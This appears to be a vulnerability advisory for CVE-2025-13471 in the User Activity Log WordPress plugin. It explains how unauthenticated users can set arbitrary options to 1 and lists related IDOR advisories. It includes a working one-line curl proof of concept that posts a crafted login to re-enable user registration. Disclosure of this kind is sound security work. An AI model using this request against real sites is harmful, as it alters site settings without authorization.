User Activity Log <= 2.2 – Unauthenticated Limited Arbitrary Option Update | CVE 2025-13471 | Plugin Vulnerabilities

Description

The plugin does not properly handle failed login attempts in some cases, allowing unauthenticated users to set arbitrary options to 1 (for example to enable User Registration when it has been turned off)

Proof of Concept

Requirements (as admin):
- Set the "Keep Failed Login Logs" to Keep (default) and "Number of failed login for non existing user" to 1 via the plugin's settings (/wp-admin/admin.php?page=general_settings_menu)

As Unauthenticated, run the following command:

curl -X POST https://example.com/wp-login.php \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "log=users_can_register&pwd=anything&wp-submit=Log+In"

Which will enable User Registration if it was disabled.

Affects Plugins

user-activity-log

No known fix

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Alex Tselevich (nos3curity)

Submitter

Alex Tselevich (nos3curity)

Submitter website

https://nosecurity.blog

Submitter twitter

Verified

Yes

WPVDB ID

cc8743f5-b1b9-4f88-b440-db044034bbfc

Timeline

Publicly Published

2026-01-06 (about 21 days ago)

Added

2025-12-30 (about 28 days ago)

Last Updated

2025-12-30 (about 28 days ago)

Other

Published

Title

Published

2025-10-21

Title

All in One Time Clock Lite – Tracking Employee Time Has Never Been Easier < 2.0.1 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Clocking In/Out

Published

2022-04-14

Title

WP 2FA < 2.2.0 - Arbitrary 2FA Disabling via IDOR

Published

2024-03-26

Title

Event Tickets and Registration < 5.8.3 - Improper Authorization to Information Disclosure

Published

2024-09-24

Title

WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible < 6.7.13 - Insecure Direct Object Reference to Account Takeover/Privilege Escalation

Published

2021-05-16

Title

Listeo < 1.6.11 - Multiple Authenticated IDOR Vulnerabilities